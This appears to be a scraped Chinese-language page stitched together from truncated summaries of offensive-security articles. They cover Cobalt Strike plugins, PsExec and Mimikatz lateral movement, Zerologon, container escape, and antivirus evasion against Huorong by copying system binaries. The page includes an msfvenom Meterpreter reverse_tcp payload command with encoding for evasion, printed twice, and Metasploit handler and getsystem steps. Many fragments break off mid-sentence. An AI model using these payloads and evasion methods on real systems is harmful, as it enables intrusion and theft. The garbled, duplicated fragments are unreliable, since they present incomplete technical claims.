浩策盾悟

Cobalt Strike 插件（通常称为 Aggressor Scripts）是使用 Aggressor Script 语言编写的脚本，用于扩展 Cobalt Strike 的功能。加载插件后，插件通常会在 Cobalt Strike 的菜单中添加新选项，或为 Beacon 提供新命令。如果有更多疑问，随时告诉我。：如果 Cobalt Strike 的内置功能无法满足特定需求，插件可以提供额外的攻击或管理能力。：在某些特殊的网络环境或目标系统中，插件可以提供定制化的攻击策略或防御规避方法。

通过在 VM 上部署 Nginx 反向代理，可以构建一个既高效又安全的前端接入层。利用配置文件中的各种指令（如 proxy_set_header 和 proxy_pass）实现请求转发，同时结合 WAF 模块（例如 ModSecurity）与防火墙策略，可以在网络边界、应用层提供多重安全防护。目前，大多数企业和云服务平台都倾向于这种分层防护模式，不仅可以隐藏内部架构，降低风险，还能对各种网络攻击进行实时检测与拦截。此外，正确配置头信息也能确保后端服务器获得真实的客户端 IP 信息，便于日志记录和安全监控。

PsExec是Microsoft Sysinternals套件中的一款工具，允许在远程Windows系统上执行命令和启动交互式shell，无需在目标主机上安装客户端，利用SMB协议传输数据，支持凭证传递和输出重定向。相比之下，Telnet是一种较老的远程登录协议，基于明文传输，功能有限且安全性低。PsExec在内网渗透中具有高隐蔽性和灵活性，能够利用域用户凭证进行远程命令执行，适用于横向移动和控制域控主机。通过实际案例，展示了如何利用PsExec上线域控主机，证明了其在企业内网渗透中的高效性。此外，PsEx

Mimikatz是一款针对Windows平台的后渗透工具，主要用于凭证转储、令牌操作和提权，帮助攻击者在获得初步访问权限后，通过提取内存中的明文密码、哈希和Kerberos票据，进行横向移动和权限提升。在内网环境中，Mimikatz常用于横向攻击、持久化配置和安全态势侦查。尽管WAF和防火墙对其本地操作影响有限，但杀毒软件和EDR系统通过签名检测和行为监控对Mimikatz的防御效果显著。攻击者常通过代码混淆和内存注入等技术绕过检测。因此，防御方需加强监控和内存保护措施，以有效应对Mimikatz的威胁。

powershell_bypass.cna 是一个适配 CobaltStrike 4.0 的插件，用于通过 PowerShell 生成免杀的 EXE 文件，绕过杀毒软件检测并实现上线。插件可从 GitHub 下载，但需注意与 CobaltStrike 版本的兼容性。生成 EXE 文件时若出现“运行异常，请查看 ScriptConsole”错误，可通过检查 ScriptConsole 输出、确认插件与 CobaltStrike 版本兼容性、检查 PowerShell 环境及插件配置等步骤进行排查和修复。插件的

msfvenom是Metasploit框架中的一个工具，用于生成各种类型的Payload（有效载荷），如木马、后门等，主要用于测试系统安全性。它支持多种编码方式、文件格式和平台。针对Windows平台，msfvenom可以生成EXE、VBS、PowerShell、DLL、Python等格式的木马，并可通过编码避免检测。对于Linux平台，它支持生成ELF、Bash、Python、Perl等格式的木马。此外，msfvenom还支持跨平台Payload生成，如Python和Ruby脚本。其他实用技巧包括生成多平

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5。msfvenom -p windows/meterpreter/reverse_tcp LHOST=<你的IP> LPORT=4444 -f exe -o beacon.exe -e x86/shikata_ga_nai -i 5。

下面我将详细描述如何使用 Metasploit（msf）提权目标主机到 SYSTEM 权限，并将提权后的会话迁移到 Cobalt Strike 工具中。此操作流程仅用于合法授权的渗透测试或实验室环境，禁止用于非法用途。

该漏洞允许攻击者在无需认证的情况下，通过伪造身份与域控制器（Domain Controller, DC）通信，最终实现对整个 Active Directory（AD）环境的完全控制。在内网中，攻击者通常已获得初步立足点（如通过钓鱼邮件或弱密码），Zerologon 漏洞的无需凭据特性使其成为快速提权的利器。：攻击者通过发送特定的 RPC 调用，将域控制器的计算机账户密码重置为已知值（通常为空密码），从而控制 DC。攻击目标是将域控制器的计算机账户密码重置为空，并利用空密码接管 DC。

目录1. 访问更多内存空间 (内存限制)2. 绕过 64 位系统的安全防护 (EDR/AV 兼容性)3. 访问 64 位系统特有的进程与 DLL4. 执行某些 PowerShell 与 C# 工具的兼容性5. 某些提权漏洞要求 64 位进程如何将 32 位 Beacon 提升到 64 位?总结: 为什么要升级到 64 位?📌 例子:📌 例子:📌 例子:📌 例子:📌 例子:步骤 1: 上传 64 位的 Beacon Payload步骤 2: 运行 64 位 Beacon步骤 3: 等待

环境识别→ 2.逃逸手法选择→ 3.控制宿主机→ 4.内网横向扩展关键点：优先利用配置错误（如特权模式），其次尝试漏洞（如runC）。逃逸后以宿主机为跳板，结合内网渗透工具（如Cobalt Strike）横向移动。

路由地址路由地址是网络中用于数据包转发的路径标识，由路由器根据路由表决定数据包从源地址到目标地址的下一跳。在网络通信中，路由地址确保数据能够准确到达目标主机。Socks5代理Socks5是一种网络协议，支持客户端通过代理服务器与目标服务器通信。它支持TCP和UDP流量，提供认证功能，常用于隐藏真实IP地址或绕过网络限制（如防火墙）。内网代理内网代理是指在局域网（LAN）内部署的代理服务器，用于管理内网用户对外部网络的访问，或在渗透测试中将内网流量转发到其他网络（如通过被控主机）。

冰蝎是一款功能强大的 WebShell 管理工具，支持生成多种反弹 payload。通过在目标机上部署冰蝎生成的 payload，可使目标主机主动连接到攻击者配置好的 MSF 监听器，从而建立 Meterpreter 会话。建立 Meterpreter 会话配置 MSF handler：set LHOST <你的IP>set LPORT <监听端口>exploit通过冰蝎在目标主机上执行反弹 payload，获取 Meterpreter 会话。权限提升操作直接尝试自动提权：getsystem。

在网络安全与渗透测试领域，内网代理是实现对目标网络深入控制和数据窃取的关键技术。和是两款功能强大的工具，在内网代理构建中各具特色。我将全面解析内网代理的构建场景、作用、方法、数据获取能力，以及 CS 与 MSF 的对比同时结合实战经验探讨其在内网探测中的作用，并优化格式以清晰阐述相关知识点。

通过将系统程序（如net.execmd.exe）复制为副本并利用这些副本执行命令，可以有效绕过火绒终端安全软件对原始系统命令的监控。在实际测试中，这种方法在主机上成功规避了火绒的拦截，完成了木马文件的下载和执行。此技术依赖于火绒规则的局限性，但在面对更智能的检测机制时，可能需要结合混淆或其他高级绕过手段。阶段攻击主机（VPS）受控主机（12SERVER-DATA1）准备木马生成output.exe，托管在无绕过火绒无复制为bypass.exe下载文件提供文件下载服务使用bypass.exe下载。